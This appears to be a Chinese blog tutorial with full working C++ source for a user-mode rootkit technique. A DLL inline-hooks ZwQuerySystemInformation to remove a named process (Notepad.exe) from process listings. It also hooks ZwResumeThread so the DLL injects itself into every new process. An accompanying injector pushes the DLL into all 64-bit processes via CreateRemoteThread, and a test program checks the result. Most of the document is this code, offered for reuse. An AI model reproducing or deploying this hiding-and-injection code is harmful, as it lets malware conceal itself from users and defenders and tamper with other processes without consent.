原理

每个进程可以通过ZwQuerySystemInformation API函数获取运行中所有有关进程的结构体链表,
通过Hook其它所有进程的ZwQuerySystemInformation API,使其在返回前先删掉想要隐藏进程的结构体,从而实现隐藏进程

但是如果只有这样,那么后创建的进程依然能识别到,所以除了直接hook ZwQuerySystemInformation ,还要hook创建进程的函数,这里选择的是ZwResumeThread api,通过hook这个api,任何一个进程在执行它时先执行hook新进程的ZwQuerySystemInformation 实现新进程也被hook的效果。

具体流程

写一个dll,效果是

  • hook本进程的ZwQuerySystemInformation函数,隐藏结构体
  • hook本进程的ZwResumeThread函数,注入这个DLL

写一个全进程注入器,把这个dll注入所有进程

隐藏结构体的方式是

NtQuerySystemInformation函数在SystemInformationClass参数为5时会在SystemInformation返回PSYSTEM_PROCESS_INFORMATION型结构体链表头,每个结构体都保存了一个当前正在运行的进程,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    PVOID Reserved2;
    ULONG HandleCount;
    ULONG SessionId;
    PVOID Reserved3;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG Reserved4;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    PVOID Reserved5;
    SIZE_T QuotaPagedPoolUsage;
    PVOID Reserved6;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved7[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

其中ImageName.buffer为wchar_t类型的进程名,NextEntryOffset为和下一个结构体节点相差的字节数,通过这个来连接,如果为0说明没有后继节点,只要通过这个把想要隐藏的隐藏掉即可

第二点,勾取ZwResumeThread时,应该先注入后恢复,同时注意注入时并不是在新线程内部注入,而是作为父进程远程线程注入

实现

dll代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
#include <windows.h>
#include <ntstatus.h>
#include <winternl.h>



#include <string>
#include <vector>
#include <tchar.h>




#pragma comment(linker,"/SECTION:.SHARED,RWS")
#pragma data_seg(".SHARE")
TCHAR g_szProcName[256] = {};
#pragma data_seg()
extern "C" {
	__declspec(dllexport) void setProcName(LPCTSTR szProcName)
	{
		_tcscpy_s(g_szProcName, szProcName);
	}
}



//PZwQuerySystemInformation
//00007FFBF7E50A70  mov         r10, rcx
//00007FFBF7E50A73  mov         eax, 36h
//00007FFBF7E50A78  test        byte ptr[7FFE0308h], 1
//00007FFBF7E50A80  jne         00007FFBF7E50A85
//00007FFBF7E50A82  syscall
//00007FFBF7E50A84  ret




BYTE orgBytesA[14];
BYTE orgBytesB[14];

typedef NTSTATUS(WINAPI* PZwQuerySystemInformation)(
	ULONG SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
	);



typedef NTSTATUS(WINAPI* PZwResumeThread)(
	HANDLE threadHandle,
	PULONG SuspendCount
	);


typedef struct _THREAD_BASIC_INFORMATION {
	NTSTATUS ExitStatus;
	PVOID TebBaseAddress;
	CLIENT_ID ClientId;
	KAFFINITY AffinityMask;
	KPRIORITY Priority;
	KPRIORITY BasePriority;
} THREAD_BASIC_INFORMATION;



FARPROC getProc(std::string moduleName, std::string processName)
{
	return GetProcAddress(GetModuleHandleA(moduleName.c_str()), processName.c_str());
}


bool hookByCode(std::string moduleName, std::string processName, PROC pFuncNew, PBYTE orgBytes)
{
	BYTE jmpcode[14] = { 0xff,0x25,0x00,0x00,0x00,0x00 };
	FARPROC orgFunc = getProc(moduleName, processName);
	PBYTE pOrgFunc = reinterpret_cast<PBYTE>(orgFunc);
	if (pOrgFunc[0] == 0xff && pOrgFunc[1] == 0x25)
	{
		return false;
	}
	DWORD dwOldProtect;

	VirtualProtect(pOrgFunc, 14, PAGE_EXECUTE_READWRITE, &dwOldProtect);


	//保存原始代码
	memcpy(orgBytes, pOrgFunc, 14);


	//8BYTE跳转为绝对地址
	DWORD64 targetAddr = reinterpret_cast<DWORD64>(pFuncNew);

	memcpy(&jmpcode[6], &targetAddr, 8);
	memcpy(pOrgFunc, jmpcode, 14);

	VirtualProtect(pOrgFunc, 14, dwOldProtect, &dwOldProtect);

	return true;
}

bool unhookByCode(std::string moduleName, std::string processName, PBYTE orgBytes)
{
	FARPROC orgFunc = getProc(moduleName, processName);
	PBYTE pOrgFunc = reinterpret_cast<PBYTE>(orgFunc);

	if (!(pOrgFunc[0] == 0xff && pOrgFunc[1] == 0x25))
	{
		return false;
	}

	DWORD dwOldProtect;

	VirtualProtect(pOrgFunc, 14, PAGE_EXECUTE_READWRITE, &dwOldProtect);

	memcpy(pOrgFunc, orgBytes, 14);


	VirtualProtect(pOrgFunc, 14, dwOldProtect, &dwOldProtect);

	return true;
}

NTSTATUS myZwQuerySystemInformation(
	ULONG SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength)
{
	unhookByCode("ntdll.dll", "NtQuerySystemInformation", &orgBytesA[0]);
	PZwQuerySystemInformation pZwQuerySystemInformation = reinterpret_cast<PZwQuerySystemInformation>(getProc("ntdll.dll", "ZwQuerySystemInformation"));
	NTSTATUS status = pZwQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
	if (status != STATUS_SUCCESS)
	{
		goto end;
	}
	if (SystemInformationClass == 5 && g_szProcName[0] != '\0')
	{
		PSYSTEM_PROCESS_INFORMATION pInfo = static_cast<PSYSTEM_PROCESS_INFORMATION>(SystemInformation);
		PSYSTEM_PROCESS_INFORMATION pNextInfo = reinterpret_cast<PSYSTEM_PROCESS_INFORMATION>(reinterpret_cast<PBYTE>(pInfo) + pInfo->NextEntryOffset);
		while (pNextInfo->NextEntryOffset)
		{
			if (!_tcsicmp(pNextInfo->ImageName.Buffer, g_szProcName))
			{
				pInfo->NextEntryOffset += pNextInfo->NextEntryOffset;
			}
			pInfo = pNextInfo;
			pNextInfo = reinterpret_cast<PSYSTEM_PROCESS_INFORMATION>(reinterpret_cast<PBYTE>(pInfo) + pInfo->NextEntryOffset);
		}
	}



end:
	hookByCode("ntdll.dll", "ZwQuerySystemInformation", reinterpret_cast<PROC>(myZwQuerySystemInformation), &orgBytesA[0]);
	return status;

}

int inject(DWORD dwPID, LPCTSTR szDllPath) {
	HANDLE hProcess = 0, hThread = 0;
	if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID))) { // 取得对应 PID 句柄
		_tprintf(_T("Open process %d failed\n"), dwPID);
		return FALSE;
	}

	DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);

	LPVOID pBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
	if (pBuf == NULL) {
		//_tprintf(_T("Memory allocation failed in process %d\n"), dwPID);
		CloseHandle(hProcess);
		return FALSE;
	}

	if (!WriteProcessMemory(hProcess, pBuf, (LPVOID)szDllPath, dwBufSize, NULL)) {
		//_tprintf(_T("WriteProcessMemory failed in process %d\n"), dwPID);
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	HMODULE hKernel32 = GetModuleHandle(_T("kernel32.dll"));
	if (hKernel32 == NULL) {
		//_tprintf(_T("GetModuleHandle failed\n"));
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	LPTHREAD_START_ROUTINE pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
	if (pThreadProc == NULL) {
		//_tprintf(_T("GetProcAddress failed\n"));
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pBuf, 0, NULL);
	if (hThread == NULL) {
		//_tprintf(_T("CreateRemoteThread failed in process %d\n"), dwPID);
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	WaitForSingleObject(hThread, 1500);

	CloseHandle(hThread);
	VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
	CloseHandle(hProcess);

	//_tprintf(_T("DLL injected successfully into process %d\n"), dwPID);
	return TRUE;
}

NTSTATUS myZwResumeThread(
	HANDLE threadHandle,
	PULONG SuspendCount)
{
	typedef NTSTATUS(NTAPI* ZwQueryInformationThread_t)(
		HANDLE ThreadHandle,
		DWORD ThreadInformationClass,
		PVOID ThreadInformation,
		ULONG ThreadInformationLength,
		PULONG ReturnLength OPTIONAL
		);
	THREAD_BASIC_INFORMATION tbi;
	FARPROC pqit = getProc("ntdll.dll", "ZwQueryInformationThread");
	NTSTATUS statusThread = reinterpret_cast<ZwQueryInformationThread_t>(pqit)(threadHandle, 0, &tbi, sizeof(tbi), NULL);
	DWORD dwPid = reinterpret_cast<DWORD>(tbi.ClientId.UniqueProcess);
	DWORD dwPrevPid = 0;
	if (dwPid != GetCurrentProcessId() && dwPid != dwPrevPid)
	{
		dwPrevPid = dwPid;
		inject(dwPid, L"C:\\Users\\a2879\\source\\repos\\HideProcess\\x64\\Debug\\HideProcess.dll");
	}

	unhookByCode("ntdll.dll", "ZwResumeThread", &orgBytesB[0]);
	PZwResumeThread pZwResumeThread = reinterpret_cast<PZwResumeThread>(getProc("ntdll.dll", "ZwResumeThread"));
	NTSTATUS status = pZwResumeThread(threadHandle, SuspendCount);

	hookByCode("ntdll.dll", "ZwResumeThread", reinterpret_cast<PROC>(myZwResumeThread), &orgBytesB[0]);
	return status;

}




BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	setProcName(L"Notepad.exe");
	std::string curProc(MAX_PATH, '\0');
	char* p = nullptr;
	GetModuleFileNameA(nullptr, &curProc[0], curProc.size());
	p = const_cast<char*>(strrchr(curProc.c_str(), '\\'));
	if (p != nullptr && !_stricmp(p + 1, "DLL_inject.exe"))
	{
		return true;
	}
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		/*CreateThread(nullptr, 0, startHide, nullptr, 0, nullptr);*/
		hookByCode("ntdll.dll", "ZwQuerySystemInformation", reinterpret_cast<PROC>(myZwQuerySystemInformation), &orgBytesA[0]);
		hookByCode("ntdll.dll", "ZwResumeThread", reinterpret_cast<PROC>(myZwResumeThread), &orgBytesB[0]);
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}


注入器本来应该实现全局注入,但是由于我这边不知道为什么一注就挂,所以就没有全局,只单独选择了exploer,这里的代码和之前的是一样的,如果想继续测试全局注入,可以试试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <iostream>

BOOL Is64BitProcess(DWORD dwPID) {
	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwPID);
	if (hProcess == NULL) {
		return FALSE;
	}

	BOOL isWow64 = FALSE;
	if (!IsWow64Process(hProcess, &isWow64)) {
		CloseHandle(hProcess);
		return FALSE;
	}

	CloseHandle(hProcess);

	return !isWow64;
}

int inject(DWORD dwPID, LPCTSTR szDllPath) {
	HANDLE hProcess = 0, hThread = 0;
	if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID))) { // 取得对应 PID 句柄
		_tprintf(_T("Open process %d failed\n"), dwPID);
		return FALSE;
	}

	DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);

	LPVOID pBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
	if (pBuf == NULL) {
		_tprintf(_T("Memory allocation failed in process %d\n"), dwPID);
		CloseHandle(hProcess);
		return FALSE;
	}

	if (!WriteProcessMemory(hProcess, pBuf, (LPVOID)szDllPath, dwBufSize, NULL)) {
		_tprintf(_T("WriteProcessMemory failed in process %d\n"), dwPID);
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	HMODULE hKernel32 = GetModuleHandle(_T("kernel32.dll"));
	if (hKernel32 == NULL) {
		_tprintf(_T("GetModuleHandle failed\n"));
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	LPTHREAD_START_ROUTINE pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
	if (pThreadProc == NULL) {
		_tprintf(_T("GetProcAddress failed\n"));
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pBuf, 0, NULL);
	if (hThread == NULL) {
		_tprintf(_T("CreateRemoteThread failed in process %d\n"), dwPID);
		VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
		CloseHandle(hProcess);
		return FALSE;
	}

	WaitForSingleObject(hThread, 1500);

	CloseHandle(hThread);
	VirtualFreeEx(hProcess, pBuf, 0, MEM_RELEASE);
	CloseHandle(hProcess);

	_tprintf(_T("DLL injected successfully into process %d\n"), dwPID);
	return TRUE;
}

void injectAllProcesses(LPCTSTR szDllPath) {
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE) {
		_tprintf(_T("CreateToolhelp32Snapshot failed\n"));
		return;
	}

	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(PROCESSENTRY32);

	if (Process32First(hSnapshot, &pe)) {
		do {
			if (pe.th32ProcessID <= 100) {
				continue;
			}

			if (!Is64BitProcess(pe.th32ProcessID)) {
				_tprintf(_T("Skipping 32-bit process: %s (PID: %d)\n"), pe.szExeFile, pe.th32ProcessID);
				continue;
			}
			if (!_tcsicmp(pe.szExeFile, L"StartMenuExperienceHost.exe") ||
				!_tcsicmp(pe.szExeFile, L"ShellExperienceHost.exe") ||
				!_tcsicmp(pe.szExeFile, L"LockApp.exe"))
			{
				_tprintf(_T("Skipping process: %s (PID: %d)\n"), pe.szExeFile, pe.th32ProcessID);
				continue;
			}

			_tprintf(_T("Attempting to inject into 64-bit process: %s (PID: %d)\n"), pe.szExeFile, pe.th32ProcessID);
			if (inject(pe.th32ProcessID, szDllPath)) {
				_tprintf(_T("Successfully injected into process: %s (PID: %d)\n"), pe.szExeFile, pe.th32ProcessID);
			}
			else {
				_tprintf(_T("Failed to inject into process: %s (PID: %d)\n"), pe.szExeFile, pe.th32ProcessID);
			}
		} while (Process32Next(hSnapshot, &pe));
	}
	else {
		_tprintf(_T("Process32First failed\n"));
	}

	CloseHandle(hSnapshot);
}

int _tmain(int argc, TCHAR* argv[]) {
	//if (argc != 2) {
	//	_tprintf(_T("USAGE: %s dll_path\n"), argv[0]);
	//	return 1;
	//}

	TCHAR dllpath[] = L"xxx\\source\\repos\\HideProcess\\x64\\Debug\\HideProcess.dll";

	injectAllProcesses(dllpath);

	return 0;
}

由于是64位,不能用taskmgr测试QAQ,所以写了一个测试程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
int main() {
	// 获取 ZwQuerySystemInformation 函数地址
	//setProcName(L"notepad.exe");
	system("pause");
	PZwQuerySystemInformation pZwQuerySystemInformation = reinterpret_cast<PZwQuerySystemInformation>(
		getProc("Ntdll.dll", "ZwQuerySystemInformation")
		);
	if (pZwQuerySystemInformation == NULL) {
		std::cerr << "Failed to get ZwQuerySystemInformation address!" << std::endl;
		return 1;
	}
	//hookByCode("Ntdll.dll", "ZwQuerySystemInformation", reinterpret_cast<PROC>(myZwQuerySystemInformation), &orgBytesA[0]);
	// 定义缓冲区大小
	ULONG bufferSize = 1024 * 1024; // 初始缓冲区大小(1MB)
	PVOID buffer = malloc(bufferSize);
	if (buffer == NULL) {
		std::cerr << "Failed to allocate memory!" << std::endl;
		return 1;
	}

	// 调用 ZwQuerySystemInformation
	NTSTATUS status;
	while ((status = pZwQuerySystemInformation(
		5, // SystemProcessInformation
		buffer,
		bufferSize,
		&bufferSize
		)) == STATUS_INFO_LENGTH_MISMATCH) {
		// 如果缓冲区不够大,重新分配更大的缓冲区
		free(buffer);
		bufferSize *= 2;
		buffer = malloc(bufferSize);
		if (buffer == NULL) {
			std::cerr << "Failed to allocate memory!" << std::endl;
			return 1;
		}
	}

	if (status != 0) {
		std::cerr << "ZwQuerySystemInformation failed with status: " << status << std::endl;
		free(buffer);
		return 1;
	}

	// 遍历进程信息
	PSYSTEM_PROCESS_INFORMATION pProcessInfo = reinterpret_cast<PSYSTEM_PROCESS_INFORMATION>(buffer);
	while (true) {
		// 输出进程ID和进程名
		std::wcout << "Process ID: " << reinterpret_cast<DWORD>(pProcessInfo->UniqueProcessId)
			<< ", Process Name: " << (pProcessInfo->ImageName.Buffer ? pProcessInfo->ImageName.Buffer : L"Unknown")
			<< std::endl;

		// 移动到下一个进程
		if (pProcessInfo->NextEntryOffset == 0) {
			break;
		}
		pProcessInfo = reinterpret_cast<PSYSTEM_PROCESS_INFORMATION>(
			reinterpret_cast<BYTE*>(pProcessInfo) + pProcessInfo->NextEntryOffset
			);
	}

	// 释放缓冲区
	free(buffer);
	system("pause");
	return 0;
}

经过测试,notepad可以隐藏